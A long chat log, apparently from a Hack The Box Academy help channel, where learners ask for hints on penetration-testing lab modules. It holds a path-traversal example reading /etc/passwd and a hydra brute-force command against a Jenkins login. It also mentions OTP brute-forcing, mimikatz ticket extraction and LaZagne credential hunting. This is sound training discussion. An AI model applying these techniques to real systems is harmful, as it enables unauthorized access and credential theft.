in most cases they are. Plenty of other people haven't found the question misleading otherwise it would have been addressed in #1234357888114364508

I dunno, I'm going through the discord search history and I'm not alone on that question. It's being retired so I don't think it's worth erratum, but I think it would be more helpful if the hint drove people away from LFI and towards the other 94 plugin vulnerabilities.

it's not being retired

Well is worth me making an erratum for the hint?

the hint i see says 'review the WPScan output' it doesn't specify LFI

True statement. I feel very primed for it though.

the question comes before the LFI ones

so it hadn't primed you or had you thinking about it; and since there's a separate question for LFI, it's safe to assume that you shouldn't be looking at LFI

it even explicitly tells you to look for 'unauthenticated file download'

Yeah, thats what has me thinking "Okay, so use this LFI to download some file."

and that's where you'd be wrong. Unauthenticated File Download != LFI

and again that question is coming BEFORE the questions relating to LFI

I know (I think) you are trying to be helpful and I appreciate that. I would get value from you explaining that though.

LFI -> displays the information in the webpage you're viewing so /page.php?someparam=../../../../../etc/passwd
File Download -> prompts you to download the file since it can't be viewed in the browser (not sure how curl handles it) so /page.php?someparam=SomeFileAccessibleViaParam.ext

Okay I see. That really messes with me.

you're taking advantage of a functionality to download a file with the Unauth File Download

as opposed to LFI which can lead to a lot more than just unauth file download

Based on my understanding, the thing it wants me to get isn't even a file, but a response formed from processing whats in the mysql DB. So, the nomenclature I need to adjust to here is that "file download" just means get something that the browser wants to save to disk.

such as, remote code execution

wrong, first sentence.

it is a file, I can't explain what that file exactly is without spoiling lab info

but if you examine the file in excel (import the file) or Google Sheets (same import functionality iirc) or Libre Office

Well now that I know not to bark up this 1 tree, let me go bark up the other 90 and see if I can understand.

you'll see more of what that file is, because it isn't necessarily an 'arbitrary' file. It's a file specific to the vulnerable plugin

Like, I recursively grepped for HTB{ and it didn't come up either, so ... maybe it's zipped?

shouldn't need to recursively grep

right, I was trying to find it another way

if you looked at the solution then you should see that it's directly in the file

I only glanced, I don't want to spoil it fully

it's not zipped, at all

if you saw what the vulnerable plugin is then that's a good basis to start your search

Google is OP

well I'm going to start with the one that looks horribly broken

i was able to find it knowing the very little info from a glance at the plugin it mentioned (if you don't know the plugin, then instead of trying to tackle them each look through for ones that are unauthenticated file downloads/file downloads)

im confident I'll get this now that I have a different perspective on this

as a general rule of thumb: if what you're doing isn't working, then you need to do something different. Getting tunnel visioned on something is an easy way to skip over other stuff

no, that isn't my issue

Build up your methodology to keep you from tunnel visioning too much

let me figure this out, and after that if I still feel as I do I'll DM you why

you were tunnel visioned. you can't say that you weren't lol

👆

and my dms aren't open, sorry, maybe if in 12 hours you're still having problems

but it's late and I need sleep. Got some phone calls to make

I see now why that question is worded exactly how it is worded. For the future searcher out there who gets stuck on "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download." within the "Hacking WordPress" Skills Assessment for the same reasons I did, what would have worked for me:

1. Put the question entirely out of your mind. Pretend you never read it.
2. Make it more vague, like, "Use a vulnerable plugin to retrieve data while unauthenticated."
3. Re-read the hint.

I'm working on the API Attacks module on Hack The Box Academy. It's a really great module, but I'm stuck on one question despite solving the rest. Can anyone help me with the solution for 'Submit the header and its value that expose another Security Misconfiguration in the API?'

hello everyone, hope you are doing good , i am block at the Credential Hunting in Windows from the pentration job role path , - i am using LaZagne.exe but it only give me the WinSCP password and username - i have try to open each browser to look for the password , but does i have found do not work Note: i am running LaZagn as Administrators mode but it does not find the rest PLEASE HELP

i have use the browser , sysadmin , and all command but nothing

Hello everyone I am stuck with the API Attacks Broken Authentication room https://academy.hackthebox.com/module/268/section/3062

Follow the same methodology as shown in the section, just with the roles you are given in this account.

Following the methodology did not lead me to the password for the customer email MasonJenkins@ymail.com

Is there is any write up about this or any hint about it

In Web fuzzing, recursive fuzzing stuck on this only question. All others completed but wasn't able to get a flag of this. Can I DM anyone please?

Hello good morning. May I have help on the Introduction to red teaming AI. Anyone done this module ?

Hello everyone I am stuck with the API Attacks Broken Authentication room https://academy.hackthebox.com/module/268/section/3062

Actually u can do as content in this section:1. use creds search mysql in ur own machine 2. u'll find not much credentials, so connect mysql in target machine with these credentials

request a OTP for the user and brute force it, then reset their password

as is outlined in the section

what is the length of the otp 4 or 5 ?

have a guess

i dont remember

what do you mean

Hey guys, anybody passed recently "Skills Assessment - Password Attacks". I mean recently? (nexura administrtor NTLM question)

I got the windows credentials from the SSH host, connected to the JUMP01, got the "online user password.xlsx" (or the similar name of the file)
But there is no passwords in it.
I literally see no other options to go, except to start bruteforcing other domain users, but bruteforcing is a bs approach, because it can take 1 minute or 3 years.

Any hint?

The things you find in C:\Temp\unattended2.xml is unrelated to the lab activity.

Can the Jump server reach/access anything else that is related to a section from module?

yup, domain controller

hi im trying out the jenkins discovery and enum, this is sort of out of scope of what is being taught but

hydra -l admin -p admin -s 8000 jenkins.inlanefreight.local http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign in:F=loginError" -v -I

i have tested the password and username to be correct but for some reason hydra cannot detect it

I would recheck your access.

Would that mean, that there might be other hosts on the 172.16.119.0 sub? Interesting. Will check.

The scenario gave you all hosts within scope, so I'd just reread that if you are looking to identify other hosts within the network outside of the DC and Jump server.

If you mean the file01 share server, there is nothing interesting there, as I wrote. Except for that "online passwords xlsx" file, but it's a scam, no passwords. There. I could start bruteforcing the other shares that my domain user doesn't have access to, but I'm dubious if that makes sense.

Might want to review the network shares section.

okay,so there is a simple question inthelinux fudnamentals thingy, and theman page gives a simple answer

but the module does not axxept the answer

wtf, what do now?

you can DM me

Hey everyone,
working on the Active Directory module, and every time I connect to the Linux attack machine using xfreerdp, the RDP session disconnects after about a minute (sometimes just a few seconds). After it drops, I have to wait a bit before I can start a new session (and when it's working it is very very slow..). Does anyone know why this happens or how to fix it?

You can try the recommended steps outlined in the last section called Using Resource effective RDP commands from here:
https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

Hey, anyone has issues spawning academy targets?

looks good atm

thanks, but most of the flags don't work at all... I did do with
xfreerdp /u:username /p:password /v:TargetIP /cert-ignore /dynamic-resolution

but still... after a bit the connection is lost
is it supposed to be like that? (and also very slow)

Did you try adjusting MTU?

At Introduction to windows cmd line tools, skill assesment last question, i seem to get the right solution but it keeps telling me wrong flag

Can anyone double check my powershell cmd or verify my solution?

Same is happening to me right now, as well

On the Win Attk/Def Module, though, but same thing is happening; I cant manage to make any meaningful connections via rdp to the kali machine, and I can only establish ocnnection once then it permabreaks, and I have to keep resetting targets

exactly... for example I need to run bloodhound on the remote linux machine but can't do much because it's so slow and I have to reset it every couple of seconds 🙁

Aye; I'm pretty much dead in the water too, cant continue further because of it lol

Having to use a vm to rdp to one machine, then rdp from that machine to another machine...it dont work

I'd love to just bypass this section because I understand what its wanting me to do (PrintBug section), but I cant...and like you, am stuck.

Just checked my target time, I'm already hour three into this too lmao

:((((((((

The "cant connect" issue doth continue

Hello Everyone I am stuk here there is no provided email that i can work with How i get this
https://academy.hackthebox.com/module/268/section/3064

Most of the time, I need to use SSH and not RDP, but even that is annoying because it’s super slow and always gets stuck andWhen it does I have to reset it

Aye, Ive tried to ssh on this one too and Im getting such a slow connection even via parrotbox and not my own kali machine; if it even works

I very much relate

yeah it's annoying

Anyone know of any issues with connection for USA? Trying to do Attacking Jenkins but I can't seem to load the website, even with vHost in etc/hosts

You dont need an email, you just need to use the API to cause another resource consumption issue, and itll give you the flag iirc

could you explain more

Just got this from VPN - tried to restart it.... Anyone else having weird issues?

You should be able to use the previous user you have been operating as, and then manipulate a call in the API to cause a bunch of requests to happen unmitigated

I already did that but it gives me error encounterd

How do you mean, and where?

Disregard - took a couple of restarts, but all is good now

Could I DM you ?

Sure

Solved 💜

@spiral geyser the bash module is above tier 0, consider other ways of counting characters. Its expecting you to not use built-in things. Follow the example using echo

Has there been any news on what might happen between letsdefend and HTB Academy? I'm curious if I should hold off and see if it gets merged into HTBA.

Hello all. I work on the api attacks / Unrestricted Resource Consumption. It seems that I need a customer mail but I only have a supplier role. I dont see how to get this email. What do I miss ?

Nothing yet

Is HTB planning a cert to compete with Offsec's OSWP? 👀

I see all those new modules got added

There is a job role path for Wi-Fi. It is therefore to be expected that an exam will follow.

https://academy.hackthebox.com/path/preview/wi-fi-penetration-tester

Bless, looking forward to it.

You can already study all the modules.

Kinda stuck on Sql Injection Fundamentals: Skills assessment. I'm on the second question "What is the root path of the web app?" I have an HTTP response with the info I presume I would need (see question hint) but there isn't any file path that works nor looks correct (compared to what Im used to). Any input is appreciated

you can DM me if you need help

I have started 🤣

Hi all, I'm having issues with the AI Data Attacks - (4) Trojan Attacks - Training the models. It's saying I'm missing the forward function but I'm following along to the best of my ability and I don't believe I missed anything. Any ideas?

hello, im stuck on Skills Assessment - SQL Injection Fundamentals, tried all payloads in the book but not working 🙂

Hey team so im in the skill assessment of Password -Attacks im trying to brutefore the username with HYDRA using berry , jayde and nexura as my candidates . so far im not reaching anyware and only ssh port is the one thats open .. am i in the right path ?

Why nexura? Also, just use a username list created via usernameanarchy

Not sure how you arrived at only 3 candidates when no other info is given in the brief

nexura is the company name first i tried with betty jayde then after no results i added the companies name

Username anarchy is your friend :)

In the footprinting module I do not understand the question about FQDN of last octet ends with "x.x.x.203"
How do we get this record? Neither of the hosts enumerated via zone transfer seem to have a record for it in DNS.

Then try a different one :) a base dig should give you a bunch of subdomains to try.

Don't try what you've already dug though

None of them seem to yield anything

I guess that's why it teaches the bruteforce tactic with the 1million list or whatever.

I really don't get this question at all.

Start small go big. The answer may not lie in the 1million lists

dude I already helped you

If not discoverable via dig axfr response nor brutforce attempt with subdomainz what really is left ?

Ty for the message I got it tho

SORRY I MEAN THIS ONE

NOW ME IS THE ONE WHO NEED HELP

So, was browsing for help on the HTB forums and stumbled upon an article that's paywalled, but labeled CPTS Flags - not sure if there's relevant information for the exam or not. Not sure where to report

in web attacks module

HHEEELLOOOOPPP!!!

GOD PLEASE HELP

Dude calm down holy

hold on let me cook

Just worth noting I suppose for PRTG Network Monitor I wasn't able to get the command working with the Notification. Tried it a couple of different ways, but wasn't appearing to create a user? Did find a metasploit module that worked for it, but definitely feels like I cheated. Not sure if something was weird with that specific box or it's user error

dude I even used a list for http methods

it just not working

What's the contents of table flag5? (Case #5)
SQLMap Essentials Attack Tuning
i just searched and find this
http://157.245.33.77:30661/case5.php?id=1
now i dont understand how could i know that i need to put the ?id=1 on there how
https://academy.hackthebox.com/module/58/section/526
i really need help

you can DM me

guys

https://academy.hackthebox.com/module/134/section/1178

in this section they want me to find the correct http method

I used a list of method and non of them work

wtf

no I am still studding it as you can see

I did not skip that

Hello everyone, I can't find the VirusTotal section in The hive. Who can tell you?

I found it

Hello all. I'm blocked on the API attacks / Unrestricted Resource Consumption question. I need to find a customer email. I fuzzed everything to find files (with and without extension, different wordlist) tryed every api but I'm stuck since 2 days on this. Any help ?

it's bruteforceable; the problem is you may be looking at something you already attacked instead of looking for something new

also it IS discoverable by dig axfr... if you add some stuff to your hosts file :) just a bit more longwinded to do it that way than use the dnsenum tool provided

well axfr might not be the right one, but all the dnsenum tool (essentially) is something like dig {word fromlist}.do.main @DNSIP

Conceptually I must be missing something, @fathom pendant

Its a subdomain of a subdomain, if that helps

So a.b.do.main

I recognize the horizontal thinking required to solve such issues but I find the manner in which dig responds to various hostnames to be quite odd and unclear to me.

For instance if it's dev.freightwhateveritis.htb

Dig asks for records from a nameserver

Thats why you have to specify the nameserver, since its private

Right, so we iterate over the namelist in hopes we find a match.

So obviously need to iterate over $i.<something>.<freightWhateverItIs>.htb

Yep, iirc you may be able to use the target ip as the name server

But it could require adding it to your hosts file.

Why would that matter though

Everything you see in a lookup is relative to the server

Why do you need to rely on your local resolver if, at the end of the day, the vpn configuration clearly can resolve the host anyway

That's a fundamental misunderstanding

Oh wait, the target isn't a hostname, it's an IP.

Resolving the host, in this instance, would be translating inlanefreight.htb to the ip

The spirit of my comment above was more to do with exactly that though: why would that matter.

But you dont need to add anything to your hosts file for dnsenum though

app.inlanefreight.htb and internal.inlanefreight.htb may be on the same ip, say 10.129.50.50, when you send a request to the server without setting the hostname (such as an http request) - if you just use the IP, the server doesn't know which one to serve you

Similarly the ns records, say you need the dns for a subdomain thats ns.something.htb, if you dont tell the nameserver what you're looking for - it doesnt know what to serve you, and serves a default answer

There is an endpoint that wants an email. Try using the username email format you are given to authenticate to endpoints as a baseline starting point.

Or ns.something.inlanefreight.htb

Wow

That makes a lot of sense in a very realistic way.

I'm looking at it from the opposite perspective as an admin. But what youv'e said makes a lot of sense now.

Hi all. I am having issues with the finding evil module. I cannot move calc.exe to the desktop. I have tried with an administrative cmd prompt but to no avail. Please advise.

hey, im doing active directory modules and i have loaded tickets into memory, now the module says to extract the tickets using mimikatz, but the command pictured here dosent work, im not sure if this is how you use mimikatz?

what exactly "isn't working" ?

when parsing the commands for mimikatz; it's everything after the mimikatz # that's the command meant to be used

i see

do i need to run mimikatz?

yes the commands shown are being run from an interactive mimikatz session

ok, wasnt that clear for someone who has never run mimikatz before 🙂 thanks

it seems like the method for using kirbi2john.py is no longer neccessary/working in the section "Kerberoasting from windows" in the active directory enumeration and attacks module. you can just use kirbi2john.

Are there mods I can ask questions to on syntax? I am stuck on final question of SQL Injection Fundamentals: Skills Assessment. I really don't know what I could be doing wrong for the final question but I guess that's the point of the assessment lol.

I figured it out but now I have more questions if anyone can answer 😆

yes

what do you mean the syntax they just need the content of the file

I meant my syntax and also method of sending SQL queries. I'm not sure if I'm allowed to talk about exactly what I did here (I'm scared of getting yelled at lol)

The SQL Injection Fundamentals module is tier 0, which means you can post content from it. Just don't post any answers or how to get the answers.

Ok here is my question then (and delete if not allowed)
Are HTTP response codes reliable for SQL injection? I was relying on them (maybe too heavily) for a bit and figured my queries only ran if I got a 200 or 302 type of response. One question I kept getting 500 thinking it failed not knowing it was working the entire time. Is there something specific that causes certain queries to return error codes?

hlow everyone

can anyone tell me about the sudo password of htb . if i run sudo su command than which password i need to write

your own user's password

for simple sudo command and if i wanted to connect it through ssh to spwan the target does i need to write spwaning password or sudo password for example ; if i am in nixfund and if i wanted to go into sudoers file i write sudo cat sudoers then waht password i need to type

bro can you tell me that this password is present in my_credential file below the username

????

the command 'sudo' uses your own user's password, whatever user you're logged in as

don't ever show that password

ok thanks bro

that's the pwnbox so i'd assume it's the pwnbox password for your user

but idk i don't really use the pwnbox

ok

you don't need to run around the system as root; anything that requires elevated permissions just use sudo

sudo -> switch user and do, if you don't specify a user it assumes root is the user you want to run as

thanks bro now i understand

https://academy.hackthebox.com/course/preview/intro-to-academy ; this module is helpful for learning how to interact with academy

I was working on a section to find who can PSRemote, and it seems you can use bloodhound for this, but does a more efficient method exist? For example, I could query each computer for local group "Remote Management Users" to see if domain/Remote Management Users exist, or maybe even check the GPO?

You can do this with LDAP

Or netexec

So if you have the credentials, I know you can enumerate hosts with, for example, netexec winrm ..etc, and you can also query members directly from the "Remote Management Group", but I wanted to know if you could actually find the computer without querying them all.

So you want to find out if a user is in the computers remote management users group without querying the computer?

They are in the domain group, Remote Management Users, but each computer has a local group as well. It seems very noisy having to query every computer on a network.

If you want to see what is in a computers local groups you are going to have to query that computer

If you want to reduce noise like for a red team engagement you will have to make informed targeted queries over longer time

But if it's not a red team just bloodhound that bad boy

hello just quickly regarding HTB new UI, I cant see advanced search for retired machines, am I blind or is it just not there??

This DNS shit man..

hello i have a problem 🙁

These modules need to explain better.

you don't need a high overview of how dns works to complete the module

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

gggggggggggggg

If I'm in this Burp Suite: Intruder module, I'm trying to get a username and password from a filtered list. Basically, I have to make the request on the website, then go to Burp Suite, send it to Intruder, clean the dollar signs, enter them one at a time in the username and password fields, then in Play Loads, load the extracted username.txt file into the username field, and the same for the password.txt file. I just need to load the passwords, make sure it's set to pitchfork attack type, and send the attack. The problem is that when it should give me the length, they all have the same 679, and that's an error.

I'm just continually getting my ass kicked, pissing time away and not learning though.

Hi thank for the help. This is already done. i'm authenticated but no way to find a customer email.

i don't recall that at all from the intruder portion of the web proxies module

its premium

With teh DNS footprinting stuff, I've amassed a list of various hostname subdomains which -- i suppose -- can themselves be targets of brutforcing. I've placed them all in a file and I read them out in a while loop, wrapped dnsenum into them, and then ran one of the '...million' lists on top.

?

this section right? https://academy.hackthebox.com/module/110/section/1054

this

My advice would be to take a break and then refer to the diagram/graphic in the section of the Footprinting module

wrong server

Maybe it's just a matter of altering the script so it can iterate over all the lists.

ooooooo

oooooooo

my bad

oh.... that's THM... not HTB

LMAO

I use both to learn forgiveness

are you still stuck on the x.x.x.203?

banned for being a THM user, sorry i don't make the rules (THIS IS A JOKE)

Yea the ...203 stuff is kicking my ass.

i said earlier: stop using the top-1million list

start with the smaller lists there's a ||fierce|| one if you want me to be more direct with the hint

lol I promise my next question will be about HTB

can someone give me nudge on server-side attack skills assessment please?

you're asking the server for {wordlist}.sub.do.main 😉

brutal

i believe i gave you that format earlier; i'm assuming you've just been trying {wordlist}.do.main

Pretty much

Just spinning wheels, this shit sucks.

module is above tier 0; don't spoil info - there's a reason i've been vague

your hostlist is missing an entry btw @hardy kestrel

also ask before sending a dm

dm please

Please bring back advanced search

this isn't relevant to academy 😉

can someone help me in section https://academy.hackthebox.com/module/134/section/1186

I can not find any files

the hint tells you to not just look for pdfs

I can not even find PDF

when I click on anything it just load for long time

do you have burpsuite running?

:)

yes

that would be why

no I mean

it also load even if it is not running

it just keep loading

so I can not find the endpoint that I can get files from

because burpsuite is intercepting the request :)

no it is not

I am sure

Are you still stuck?

not it is not intercepting and it is just loadin for 5 minutes

try resetting the target, if that doesn't work reach out to support

no I helped him

it is like that from yesterday

http://94.237.123.185:40922/documents.php?uid=4 for example this is just loading

Alright! Thank you!

even if I change the number

ah looks like it's an issue with that module atm; it's already been reported in #1234357888114364508

https://discord.com/channels/473760315293696010/1444878586392743997

I used katana to find some endpoints, found a endpoint can take a number.. in the section they say look at the first 20 numbers I did that but file alwyas does not exists

after about a few minutes it should load

hmmm okay

not sure why you used a tool tbh the module kinda walks you through a fair bit of it 😉

I though maybe I can get an other endpoint or something

okay then I will move on to the next sections

the the issue you're facing may be a more simple one

it's expecting a POST request, not a GET request; so the curl will be different

if the server is down then he is down

GET -> somewebsite/page.php?param=value
Post -> somewebsite/page.php

[Headers here]

param=value

I hope it is not going to be down in the exam

oh worked

so I don't undersand is it down or what

it's not down

oh so I am down then

it's just a browser issue (it's trying to connect to something that is down, the fontcache)

but cURL doesn't care about fonts

I don't care too

yes, but the webpage does if you're using a browser

yeah that's an issue

bowers nowadays

i mean the main thing you really need to know is inspecting the request to the endpoint to see how to form your cURL for grabbing files

no need for burp to intercept it

I just click on buttons and it does not work that's what I know
and that is my job

clicking buttons tell I found the flag

then you're not learning

oh maybe I should take the bash scripting module

I am

test me

give me a challenge

now

well the module provides a sample script you can use/modify

yesterday I solve 2 CTF on THM since I don't have sub on HTB

you just proved you're not by the response of 'i just click buttons and it doesn't work... clicking buttons until i find the flag'

am not good with bash you know

you don't have to be

hold on let me get the flag and show you

let me cook

the module gives you an (almost) perfect script to use. It just doesn't check for any other extensions besides pdf

and it uses a GET request instead of POST

oh nice

let me cook again then

if you want to learn figure out what that script is actually doing

curl -s "$url/documents.php?uid=$i" here I have to put -X POST right

I know but why remove it 😭

did not work

maybe ask in #boxes or #general (aka more relevant channels)

refer to my GET vs POST examples above, with POST your paramaters aren't in the URL

hmmm.. you are right

you need to supply data for a POST command, i suggest messing with CURL first before adjusting the script

I have to put -d then and pass $i

smart smart

Hi, I am currently in the wordpress hacking module and I did the following qn in the directory indexing part: Keep in mind the key WordPress directories discussed in the WordPress Structure section. Manually enumerate the target for any directories whose contents can be listed. Browse these directories and locate a flag with the file name flag.txt and submit its contents as the answer.
While I managed to find the file, I had to look through each plugin individually. Is there a faster way to do this? I tried writing scripts and using gobuster but to no avail

i believe wpscan can do it but i could be wrong.

I got just pdf files

they say you need txt

look at the script and think what you can modify for txt files, or any other 3 letter extensions

nah

got it

I did it manually with burp

I suggest looking into and learning regex

I think I could just do it with ffuf to get the flag

nope

yes. I can filter for pdf

I will do it now to prove it

there's a very simple reason you can't

what is it

the flag file isn't a standard name

I can use the flag -fr

also -fr is filter out

who cares I can filter any pdf files

you want -mr

then I will get txt

that's also if the file is on the page you're viewing

aka it'd have to be in the href of the page...

it is

yes

so I can get it with ffuf

are you fuzzing with a list 1-20; on just /documents?

because that... that really won't get you much as it'll hit every UID

I already got the flag but I will try again now

now if you searched for txt files

but i really suggest just learning cURL

I know curl

but I don't know how to make a bash script with it

not only is it better, for the most part, it also has the added benefit of allowing you to download files

the module provides a bash script, you can learn from that

you can also take the intro to bash scripting module

yes but I have to do things with it like change the method

i generally suggest the Information Security Foundations skill path before CWES

even when I did it just got the pdf files

it's really... not that hard

hmmmmmmmm

you already did it with a singular curl command a minute ago

break things down to their essentials

oh the page that has the flag has also pdf

correct

so if I filter pdf I can not get the flag also

hmmmm

hold on let me cook

^ also literally what i said earlier

and you also likely used the wrong flag with ffuf

-f[option] -> Filter Out (don't include)
-m[option] -> Match (include)